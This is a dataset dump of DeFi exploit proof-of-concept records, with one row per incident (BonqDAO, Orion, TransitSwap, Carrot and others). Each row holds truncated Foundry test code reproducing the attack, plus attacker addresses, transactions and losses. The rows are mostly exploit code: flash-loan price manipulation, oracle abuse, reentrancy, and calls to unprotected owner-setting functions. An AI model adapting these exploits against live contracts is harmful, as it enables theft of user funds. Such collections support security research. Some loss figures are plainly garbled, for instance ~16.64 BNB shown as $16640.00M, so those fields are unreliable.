source_code stringlengths 878 31.2k | type stringclasses 1
value | protocol stringlengths 2 33 | date stringclasses 70
values | file_name stringlengths 10 41 | attack_vector stringclasses 4
values | content_hash stringlengths 16 16 | collected_at stringdate 2026-01-07 10:59:16 2026-01-07 10:59:16 | _source stringclasses 1
value | chain stringclasses 8
values | block_number int64 1.11M 356M ⌀ | total_lost_raw stringlengths 3 127 ⌀ | total_lost_usd float64 0 19,026B ⌀ | attacker_address stringlengths 65 82 ⌀ | attack_contract stringlengths 70 89 ⌀ | vulnerable_contract stringlengths 68 82 ⌀ | attack_tx stringlengths 89 115 ⌀ | postmortem_url stringclasses 85
values | twitter_url stringlengths 48 62 ⌀ | has_keyinfo bool 2
classes | has_analysis bool 2
classes | has_attack_vector bool 2
classes | severity stringclasses 4
values | severity_raw stringlengths 3 127 ⌀ | category stringclasses 5
values | exploit_code stringlengths 0 25.5k | has_exploit_code bool 2
classes | keyinfo_total_lost stringlengths 0 127 | keyinfo_attacker stringlengths 0 82 | keyinfo_attack_contract stringlengths 0 89 | keyinfo_vulnerable_contract stringlengths 0 82 | keyinfo_attack_tx stringlengths 0 115 | analysis_postmortem stringclasses 82
values | analysis_twitter stringlengths 0 62 | funds_lost_formatted stringlengths 2 13 | content_richness_score float64 0.63 10 | quality_estimate stringclasses 3
values | title stringlengths 20 51 | has_total_lost bool 2
classes | has_vulnerable_contract bool 2
classes | has_attack_tx bool 2
classes | has_postmortem bool 2
classes |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1623999717482045440
// https://twitter.com/BlockSecTeam/status/1624077078852210691
// @TX
// https://bscscan.com/tx/0x61293c6dd5211a98f1a26c... | exploit_poc | Sheep | 2023-02 | Sheep_exp.sol | flash_loan | fec99f81beef49a4 | 2026-01-07T10:59:16.515269 | postmortems | bsc | 25,543,755 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
DVM(dodo).flashLoan(380 * 1e18, 0, address(this), new bytes(1));
emit log_named_decimal_uint("Attacker WBNB balance after exploit", WBNB.balanceOf(address(this)), 18);
} | true | Unknown | 4.32 | low | Sheep Exploit (2023-02) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.17;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo
// Total Lost : BEUR stablecoin and ALBT token (~88MUS$)
// |_ 100,514,098.3407 BEUR from BonqDAO protocol
// |_ 113,813,998.3698 ALBT from BonqDAO's borrowers
// Attacker: 0xcAcf2... | exploit_poc | BonqDAO | 2023-02 | BonqDAO_exp.sol | oracle_manipulation | 1b16549a68b78baa | 2026-01-07T10:59:16.515361 | postmortems | polygon | 38,792,977 | BEUR stablecoin and ALBT token (~88MUS$) | 88,000,000 | null | null | null | null | null | null | true | true | true | critical | BEUR stablecoin and ALBT token (~88MUS$) | oracle-manipulation | function testExploit() public {
// Full simulation, run Tx1 and Tx2
vm.createSelectFork("polygon", 38_792_977);
exploit = new Exploit();
// Pre-works, check out: https://polygonscan.com/address/0xed596991ac5f1aa1858da66c67f7cfa76e54b5f1#tokentxns
deal(address(TRB), address(explo... | true | $88.00M | 7 | medium | BonqDAO Exploit (2023-02) | true | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
// analysis
// https://blog.verichains.io/p/analyzing-the-lz-token-hack
// https://twitter.com/immunefi/status/1630210901360951296
// https://bscscan.com/tx/0xaee8ef10ac816834cd7026ec34f35bdde568191fe2fa67724fcf2739e48c3cae e... | exploit_poc | LaunchZone | 2023-02 | LaunchZone_exp.sol | null | 0bdce8584698f823 | 2026-01-07T10:59:16.515494 | postmortems | bsc | 26,024,420 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
console.log("Running on BSC at : ", block.number);
console.log("BscexDeployer LZ Balalnce", LZ.balanceOf(BscexDeployer));
console.log("LZ allowance to swapXImp", LZ.allowance(BscexDeployer, swapXImp) / 1e18);
// lazy payload check the previous swapX PoC... | true | Unknown | 5 | medium | LaunchZone Exploit (2023-02) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/SlowMist_Team/status/1623956763598000129
// https://twitter.com/BlockSecTeam/status/1623901011680333824
// https://twitter.com/peckshield/status/162391025703361... | exploit_poc | dForce | 2023-02 | dForce_exp.sol | flash_loan | 8eeccca9c1aa73b1 | 2026-01-07T10:59:16.515564 | postmortems | arbitrum | 59,527,633 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
borrower = new Borrower();
payable(address(0x0)).transfer(address(this).balance);
WSTETH.approve(address(curvePool), type(uint256).max);
WSTETHCRV.approve(address(curvePool), type(uint256).max);
balancerFlashloan();
USX.approve(address(curv... | true | Unknown | 6 | medium | dForce Exploit (2023-02) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1628319536117153794
// https://twitter.com/BeosinAlert/status/1628301635834486784
// @TX
// https://bscscan.com/tx/0x06bbe093d9b84783b8ca92a... | exploit_poc | DYNA | 2023-02 | DYNA_exp.sol | flash_loan | 975825a075331b43 | 2026-01-07T10:59:16.515659 | postmortems | bsc | 25,879,486 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | false | Unknown | 3.3 | low | DYNA Exploit (2023-02) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.17;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analsysi
// https://twitter.com/peckshield/status/1621337925228306433
// https://twitter.com/BlockSecTeam/status/1621263393054420992
// https://www.numencyber.com/analysis-of-orionprotocol-reen... | exploit_poc | Orion | 2023-02 | Orion_exp.sol | reentrancy | 4a140cf34f463f0f | 2026-01-07T10:59:16.515714 | postmortems | ethereum | 16,542,147 | null | null | null | null | null | null | null | null | false | false | true | medium | null | reentrancy | function testExploit() public {
deal(address(USDT), address(this), 1e6); // set the USDT balance of exploiter is 1
deal(address(USDC), address(this), 1e6); // set the USDC balance of exploiter is 1
ATK = new ATKToken(address(this));
addLiquidity();
address(USDT).call(abi.encodeW... | true | Unknown | 6 | medium | Orion Exploit (2023-02) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://mirror.xyz/revertfinance.eth/3sdpQ3v9vEKiOjaHXUi3TdEfhleAXXlAEWeODrRHJtU
// @TX
// https://etherscan.io/tx/0xdaccbc437cb07427394704fbcc8366589ffccf974ec6524f3483844b043f31d... | exploit_poc | RevertFinance | 2023-02 | RevertFinance_exp.sol | null | f4e6da616ff08a2e | 2026-01-07T10:59:16.515775 | postmortems | ethereum | 16,653,389 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | false | Unknown | 1.5 | low | RevertFinance Exploit (2023-02) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "forge-std/console.sol";
// @Analysis
// https://twitter.com/danielvf/status/1621965412832350208
// https://medium.com/sperax/usds-feb-3-exploit-report-from-engineering-team-9f0fd3cef00c
// @TX
// https://arbiscan.io/t... | exploit_poc | USDs | 2023-02 | USDs_exp.sol | null | a917712186ac7d36 | 2026-01-07T10:59:16.515819 | postmortems | arbitrum | 57,803,529 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | function testExploit() public {
usds.transfer(ATTACKER_CONTRACT, 11e18);
// Etch code. In the real hack this was a Gnosis Safe being deployed
vm.etch(ATTACKER_CONTRACT, bytes("code"));
// Trigger balance recalculation
vm.prank(ATTACKER_CONTRACT);
usds.transfer(address(t... | true | Unknown | 2.83 | low | USDs Exploit (2023-02) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/NumenAlert/status/1626447469361102850
// https://twitter.com/bbbb/status/1626392605264351235
// @TX
// https://bscscan.com/tx/0x146586f05a4513136deab3557ad15df8... | exploit_poc | Starlink | 2023-02 | Starlink_exp.sol | flash_loan | 0f0046b2846d4dcc | 2026-01-07T10:59:16.515856 | postmortems | bsc | 25,729,304 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
dodoFlashAmount1 = WBNB.balanceOf(dodo1);
DVM(dodo1).flashLoan(dodoFlashAmount1, 0, address(this), new bytes(1));
emit log_named_decimal_uint("Attacker WBNB balance after exploit", WBNB.balanceOf(address(this)), 18);
} | true | Unknown | 4.65 | low | Starlink Exploit (2023-02) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/peckshield/status/1630490333716029440
// https://twitter.com/drdr_zz/status/1630500170373685248
// https://twitter.com/gbaleeeee/status/1630587522698080257
// @T... | exploit_poc | EFVault | 2023-02 | EFVault_exp.sol | null | 7009d9073b2099ae | 2026-01-07T10:59:16.515899 | postmortems | ethereum | 16,696,239 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | false | Unknown | 0.63 | low | EFVault Exploit (2023-02) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/peckshield/status/1626493024879673344
// @TX
// https://etherscan.io/tx/0x138daa4cbeaa3db42eefcec26e234fc2c89a4aa17d6b1870fc460b2856fd11a6
// https://twitter.co... | exploit_poc | Dexible | 2023-02 | Dexible_exp.sol | null | a03d546e9b624a28 | 2026-01-07T10:59:16.515939 | postmortems | ethereum | 16,646,022 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | false | Unknown | 1.5 | low | Dexible Exploit (2023-02) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1630111965942018049
// https://twitter.com/peckshield/status/1630100506319413250
// @TX
// https://bscscan.com/tx/0x3ee23c1585474eaa4f976313... | exploit_poc | SwapX | 2023-02 | SwapX_exp.sol | null | 38ad235cb5198ef0 | 2026-01-07T10:59:16.515987 | postmortems | bsc | 26,023,088 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | false | Unknown | 1.69 | low | SwapX Exploit (2023-02) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analsis
// https://twitter.com/peckshield/status/1626367531480125440
// https://twitter.com/spreekaway/status/1626319585040338953
// @TX
// https://snowtrace.io/tx/0x1266a937c2ccd970e5d7929021... | exploit_poc | Platypus | 2023-02 | Platypus_exp.sol | flash_loan | 75a6e4d5decc65a0 | 2026-01-07T10:59:16.516032 | postmortems | avalanche | 26,343,613 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | false | Unknown | 4 | low | Platypus Exploit (2023-02) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/MevRefund/status/1622793836291407873
// https://twitter.com/peckshield/status/1622801412727148544
// @TX
// https://etherscan.io/tx/0x90b468608fbcc7faef46502b19... | exploit_poc | CowSwap | 2023-02 | CowSwap_exp.sol | null | bfcb07c4ecb015af | 2026-01-07T10:59:16.516091 | postmortems | ethereum | 16,574,048 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | false | Unknown | 1.22 | low | CowSwap Exploit (2023-02) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
interface IQBridge {
function deposit(uint8 destinationDomainID, bytes32 resourceID, bytes calldata data) external payable;
}
interface IQBridgeHandler {
// mapping(address => bool) public... | exploit_poc | Qubit | 2022-01 | Qubit_exp.sol | null | 24ae87ced5df0bdb | 2026-01-07T10:59:16.516134 | postmortems | unknown | 14,090,169 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
cheat.startPrank(attacker);
// emit log_named_uint(
// "Before exploiting, attacker OP Balance:",
// op.balanceOf(0x0A0805082EA0fc8bfdCc6218a986efda6704eFE5)
// );
bytes32 resourceID = hex"00000000000000000000002f422fe9ea622049d6f73f81a... | true | Unknown | 3.26 | low | Qubit Exploit (2022-01) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
address WETH_Address = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
AnyswapV4R... | exploit_poc | Anyswap | 2022-01 | Anyswap_exp.sol | null | 5800ab98fff77192 | 2026-01-07T10:59:16.516180 | postmortems | ethereum | 14,037,236 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExample() public {
//https://etherscan.io/tx/0xe50ed602bd916fc304d53c4fed236698b71691a95774ff0aeeb74b699c6227f7
// anySwapOutUnderlyingWithPermit(
// address from,
// address token,
// address to,
// uint amount,
// uint deadlin... | true | Unknown | 3.06 | low | Anyswap Exploit (2022-01) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "forge-std/interfaces/IERC20.sol";
// @KeyInfo - Total Lost : 9M USD
// Attacker : 0xfb63aa935cf0a003335dce9cca03c4f9c0fa4779
// Attack Contract : 0xbb2789b418fa18f9526ba79fa7038d4e6d753f73
// Vulnerable Contract : 0xCcd0... | exploit_poc | yETH | 2025-12 | yETH_exp.sol | flash_loan | 225099b54c2dbd1c | 2026-01-07T10:59:16.516229 | postmortems | unknown | null | 9M USD | 9,000,000 | null | null | null | null | null | null | true | false | true | critical | 9M USD | flash-loan | function testExploit() public balanceLog {
_setupInitialBalances();
_initialRateUpdate();
_executeExploitSequence();
//Take back assets from flashloan to get actual profit
_takeInitialsBack();
} | true | 9M USD | $9.00M | 8 | high | yETH Exploit (2025-12) | true | false | false | false | ||||||
//SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// Report https://twitter.com/CertiKAlert/status/1576195971003858944
// Attacker : 0x08e08f4b701d33c253ad846868424c1f3c9a4db3
// Attack Contract : 0x5EfD021Ab403B5b6bBD30fd2E3C26f83f03163d4
// Vulnerable ... | exploit_poc | RL | 2022-10 | RL_exp.sol | flash_loan | 12e7f7e95046e55a | 2026-01-07T10:59:16.516302 | postmortems | bsc | 21,794,289 | null | null | null | null | https://bscscan.com/address/0x4bbfae575dd47bcfd5770ab4bc54eb83db088888 | null | null | null | false | false | true | medium | null | flash-loan | false | https://bscscan.com/address/0x4bbfae575dd47bcfd5770ab4bc54eb83db088888 | Unknown | 5.34 | medium | RL Exploit (2022-10) | false | true | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.17;
import "forge-std/Test.sol";
// Total Lost: $180k
// Attacker: 0x4206d62305d2815494dcdb759c4e32fca1d181a0
// Attack Contract: 0xEb4c67E5BE040068FA477a539341d6aeF081E4Eb
// Vulnerable Contract: 0x3dC7E6FF0fB79770FA6FB05d1ea4deACCe823943
// Attack Tx: http... | exploit_poc | Market | 2022-10 | Market_exp.sol | flash_loan | 21cbd126063dd9ee | 2026-01-07T10:59:16.516360 | postmortems | polygon | 34,716,800 | $180k | 180,000 | null | null | null | https://phalcon.blocksec.com/tx/polygon/0xb8efe839da0c89daa763f39f30577dc21937ae351c6f99336a0017e63d387558 | null | null | false | false | true | high | $180k | flash-loan | false | https://phalcon.blocksec.com/tx/polygon/0xb8efe839da0c89daa763f39f30577dc21937ae351c6f99336a0017e63d387558 | $180.0K | 7 | medium | Market Exploit (2022-10) | true | false | true | false | |||||||
//SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BeosinAlert/status/1582181583343484928
// TX
// https://bscscan.com/tx/0x8385625e9d8011f4ad5d023d64dc7985f0315b6a4be37424c7212fe4c10dafe0
contract ContractTest is Test... | exploit_poc | PLTD | 2022-10 | PLTD_exp.sol | flash_loan | 1754262cd617cff7 | 2026-01-07T10:59:16.516439 | postmortems | bsc | 22,252,045 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | false | Unknown | 2.29 | low | PLTD Exploit (2022-10) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~250k US$ which resulted in ~50k profit
// Attacker : 0x056c20ab7e25e4dd7e49568f964d98e415da63d3
// Attack Contract : 0x8523c7661850d0da4d86587ce9674da23369ff26
// Vulne... | exploit_poc | ULME | 2022-10 | ULME_exp.sol | flash_loan | e6e7699f62609c65 | 2026-01-07T10:59:16.516488 | postmortems | unknown | 22,476,695 | ~250k US$ which resulted in ~50k profit | 250,000 | null | null | null | https://phalcon.blocksec.com/tx/bsc/0xdb9a13bc970b97824e082782e838bdff0b76b30d268f1d66aac507f1d43ff4ed | null | null | true | true | true | high | ~250k US$ which resulted in ~50k profit | flash-loan | false | ~250k US$ which resulted in ~50k profit | https://phalcon.blocksec.com/tx/bsc/0xdb9a13bc970b97824e082782e838bdff0b76b30d268f1d66aac507f1d43ff4ed | $250.0K | 7 | medium | ULME Exploit (2022-10) | true | false | true | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~187.75 WETH
// Attacker : 0x1dc90b5b7FE74715C2056e5158641c0af7d28865
// Attack Contract : https://etherscan.io/address/0x4b77c789fa35b54dacb5f6bb2daaa01554299d6c
// Vul... | exploit_poc | MEVa47b | 2022-10 | MEVa47b_exp.sol | flash_loan | 7a80787511256b1e | 2026-01-07T10:59:16.516569 | postmortems | ethereum | 15,741,332 | ~187.75 WETH | 187.75 | null | https://etherscan.io/address/0x4b77c789fa35b54dacb5f6bb2daaa01554299d6c | https://etherscan.io/address/0x00000000000a47b1298f18cf67de547bbe0d723f#code | https://etherscan.io/tx/0x35ecf595864400696853c53edf3e3d60096639b6071cadea6076c9c6ceb921c1 | null | null | true | true | true | low | ~187.75 WETH | flash-loan | function testExploit() public {
emit log_named_decimal_uint(
"\n[Start] Attacker WETH balance before exploit", WETH_TOKEN.balanceOf(address(this)), 18
);
address[] memory tokens = new address[](1);
tokens[0] = address(WETH_TOKEN);
uint256[] memory amounts = new uint2... | true | ~187.75 WETH | https://etherscan.io/address/0x4b77c789fa35b54dacb5f6bb2daaa01554299d6c | https://etherscan.io/address/0x00000000000a47b1298f18cf67de547bbe0d723f#code | https://etherscan.io/tx/0x35ecf595864400696853c53edf3e3d60096639b6071cadea6076c9c6ceb921c1 | $188 | 10 | high | MEVa47b Exploit (2022-10) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/AnciliaInc/status/1587848874076430336
// @Address
// https://bscscan.com/txs?a=0xb12011c14e087766f30f4569ccaf735ec2182165
interface Bond {
function buyBond... | exploit_poc | INUKO | 2022-10 | INUKO_exp.sol | flash_loan | 8947dc92ee92ddd1 | 2026-01-07T10:59:16.516631 | postmortems | bsc | 22,169,169 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public payable {
address(WBNB).call{value: 5 ether}("");
// add LP
addLiquidity();
// FlashLoan manipulate price, then buy bond
buyBond();
// change time pass time check , claim reward
cheats.warp(block.timestamp + 3 * 24 * 60 * 60);
... | true | Unknown | 6 | medium | INUKO Exploit (2022-10) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : 290,671 USDT
// Attacker : 0x986b2e2a1cf303536138d8ac762447500fd781c6
// Attack Contract : https://bscscan.com/address/0xFf333DE02129AF88aAe101ab777d3f5D709FeC6f
// Vuln... | exploit_poc | RES | 2022-10 | RES_exp.sol | flash_loan | 47d3a9d6be9df03e | 2026-01-07T10:59:16.516703 | postmortems | bsc | 21,948,016 | 290,671 USDT | 290 | null | https://bscscan.com/address/0xFf333DE02129AF88aAe101ab777d3f5D709FeC6f | https://bscscan.com/address/0xeccd8b08ac3b587b7175d40fb9c60a20990f8d21 | null | null | null | true | true | true | low | 290,671 USDT | flash-loan | function testExploit() public {
emit log_named_decimal_uint(
"[Start] Attacker USDT balance before exploit", USDT_TOKEN.balanceOf(address(this)), 18
);
USDT_WBNB_PAIR.swap(10_014_120_886_666_860_414_836_616, 0, address(this), "borrowusdt");
emit log_named_decimal_uint(
... | true | 290,671 USDT | https://bscscan.com/address/0xFf333DE02129AF88aAe101ab777d3f5D709FeC6f | https://bscscan.com/address/0xeccd8b08ac3b587b7175d40fb9c60a20990f8d21 | $290 | 9 | high | RES Exploit (2022-10) | true | true | false | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost :
// Attacker : 0xd11a93a8db5f8d3fb03b88b4b24c3ed01b8a411c
// Attack Contract : https://bscscan.com/address/0x5575406ef6b15eec1986c412b9fbe144522c45ae
// Vulnerable Contra... | exploit_poc | Carrot | 2022-10 | Carrot_exp.sol | access_control | e80c60e08c1ef8d2 | 2026-01-07T10:59:16.516776 | postmortems | bsc | 22,055,611 | // Attacker : 0xd11a93a8db5f8d3fb03b88b4b24c3ed01b8a411c | 0 | null | https://bscscan.com/address/0x5575406ef6b15eec1986c412b9fbe144522c45ae | https://bscscan.com/address/0xcFF086EaD392CcB39C49eCda8C974ad5238452aC | https://bscscan.com/tx/0xa624660c29ee97f3f4ebd36232d8199e7c97533c9db711fa4027994aa11e01b9 | null | null | true | true | true | low | // Attacker : 0xd11a93a8db5f8d3fb03b88b4b24c3ed01b8a411c | access-control | function testExploit() public {
emit log_named_decimal_uint(
"[Start] Attacker BUSDT balance before exploit", BUSDT_TOKEN.balanceOf(address(this)), 18
);
// Call vulnerable transReward() to set this contract as owner. No auth control
CARROT_TOKEN.transReward(abi.encodeWithSe... | true | // | https://bscscan.com/address/0x5575406ef6b15eec1986c412b9fbe144522c45ae | https://bscscan.com/address/0xcFF086EaD392CcB39C49eCda8C974ad5238452aC | https://bscscan.com/tx/0xa624660c29ee97f3f4ebd36232d8199e7c97533c9db711fa4027994aa11e01b9 | Unknown | 8.87 | high | Carrot Exploit (2022-10) | false | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~127K BUSDT
// Attacker : 0x3DF6cd58716d22855aFb3B828F82F10708AfbB4f
// Attack Contract : https://bscscan.com/address/0xd7ba198ce82f4c46ad8f6148ccfdb41866750231
// Vulne... | exploit_poc | ATK | 2022-10 | ATK_exp.sol | null | 2b745891194ddf63 | 2026-01-07T10:59:16.516843 | postmortems | bsc | 22,102,838 | ~127K BUSDT | 127,000 | null | https://bscscan.com/address/0xd7ba198ce82f4c46ad8f6148ccfdb41866750231 | https://bscscan.com/address/0x9cb928bf50ed220ac8f703bce35be5ce7f56c99c | null | null | null | true | true | false | high | ~127K BUSDT | unknown | function testExploit() public {
emit log_named_decimal_uint(
"[Start] Attacker ATK balance before exploit", ATK_TOKEN.balanceOf(EXPLOIT_CONTRACT), 18
);
WBNB_TOKEN.deposit{value: 2 ether}();
_WBNBToBUSDT();
swapamount = BUSDT_TOKEN.balanceOf(address(ATK_BUSDT_PAIR))... | true | ~127K BUSDT | https://bscscan.com/address/0xd7ba198ce82f4c46ad8f6148ccfdb41866750231 | https://bscscan.com/address/0x9cb928bf50ed220ac8f703bce35be5ce7f56c99c | $127.0K | 7.12 | medium | ATK Exploit (2022-10) | true | true | false | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$292K (30,437 OHM)
// Attacker : 0x443cf223e209e5a2c08114a2501d8f0f9ec7d9be
// Attack Contract : 0xa29e4fe451ccfa5e7def35188919ad7077a4de8f
// Vulnerable Contract : 0x0... | exploit_poc | OlympusDao | 2022-10 | OlympusDao_exp.sol | null | 5bac4df343e5f025 | 2026-01-07T10:59:16.516893 | postmortems | ethereum | 15,794,363 | ~$292K (30,437 OHM) | 292,000 | null | null | null | https://etherscan.io/tx/0x3ed75df83d907412af874b7998d911fdf990704da87c2b1a8cf95ca5d21504cf | null | null | true | true | false | high | ~$292K (30,437 OHM) | unknown | function testExploit() public {
console.log("---------- Start from block %s ----------", block.number);
emit log_named_decimal_uint("Attacker OHM balance", IERC20(OHM).balanceOf(address(this)), 9);
address fakeToken = address(new FakeToken());
uint256 ohmBalance = IERC20(OHM).balanceOf... | true | ~$292K (30,437 OHM) | https://etherscan.io/tx/0x3ed75df83d907412af874b7998d911fdf990704da87c2b1a8cf95ca5d21504cf | $292.0K | 6.11 | medium | OlympusDao Exploit (2022-10) | true | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1585575129936977920
// https://twitter.com/peckshield/status/1585572694241988609
// https://twitter.com/BeosinAlert/status/15855870309812183... | exploit_poc | VTF | 2022-10 | VTF_exp.sol | flash_loan | 406d6da4ec2634e6 | 2026-01-07T10:59:16.516933 | postmortems | bsc | 22,535,101 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
contractFactory();
// change time to pass time check
cheat.warp(block.timestamp + 2 * 24 * 60 * 60);
DVM(dodo).flashLoan(0, 100_000 * 1e18, address(this), new bytes(1));
emit log_named_decimal_uint("[End] Attacker USDT balance after exploit", USDT... | true | Unknown | 4.96 | low | VTF Exploit (2022-10) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~16.64 BNB
// Attacker : 0xDE78112FF006f166E4ccfe1dfE4181C9619D3b5D
// Attack Contract : 0x80e5FC0d72e4814cb52C16A18c2F2B87eF1Ea2d4
// Vulnerable Contract : 0x32B166e082... | exploit_poc | HEALTH | 2022-10 | HEALTH_exp.sol | flash_loan | ffb3077db642dcd8 | 2026-01-07T10:59:16.516979 | postmortems | bsc | 22,337,425 | ~16.64 BNB | 16,640,000,000 | null | null | null | https://bscscan.com/tx/0xae8ca9dc8258ae32899fe641985739c3fa53ab1f603973ac74b424e165c66ccf | null | null | true | true | true | critical | ~16.64 BNB | flash-loan | function testExploit() public {
emit log_named_decimal_uint(
"[Start] Attacker WBNB balance before exploit", WBNB_TOKEN.balanceOf(address(this)), 18
);
// Approving PancakeSwap router to spend attacker's WBNB and HEALTH
WBNB_TOKEN.approve(address(PS_ROUTER), type(uint256).ma... | true | ~16.64 BNB | https://bscscan.com/tx/0xae8ca9dc8258ae32899fe641985739c3fa53ab1f603973ac74b424e165c66ccf | $16640.00M | 8.08 | high | HEALTH Exploit (2022-10) | true | false | true | false | |||||
// SPDX-License-Identifier: GPL-3.0
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : over $21 Million
// Attacker : 0x5f0b31AA37Bce387a8b21554a8360C6B8698FbEF
// Attack Contract : https://bscscan.com/address/0x8CA8fD9C7641849A14CbF72FaF05c305B0c68a34
// Vul... | exploit_poc | TransitSwap | 2022-10 | TransitSwap_exp.sol | null | bc6fbd0441dfaa80 | 2026-01-07T10:59:16.517036 | postmortems | bsc | 21,816,545 | over $21 Million | 21,000,000 | null | https://bscscan.com/address/0x8CA8fD9C7641849A14CbF72FaF05c305B0c68a34 | https://bscscan.com/address/0x8785bb8deAE13783b24D7aFE250d42eA7D7e9d72 | https://bscscan.com/tx/0x181a7882aac0eab1036eedba25bc95a16e10f61b5df2e99d240a16c334b9b189 | null | null | true | true | false | critical | over $21 Million | unknown | function testExploit() public {
emit log_named_decimal_uint(
"[Start] Attacker USDT balance before exploit", BUSDT_TOKEN.balanceOf(address(this)), 18
);
(bool success,) = TRANSIT_SWAP.call(
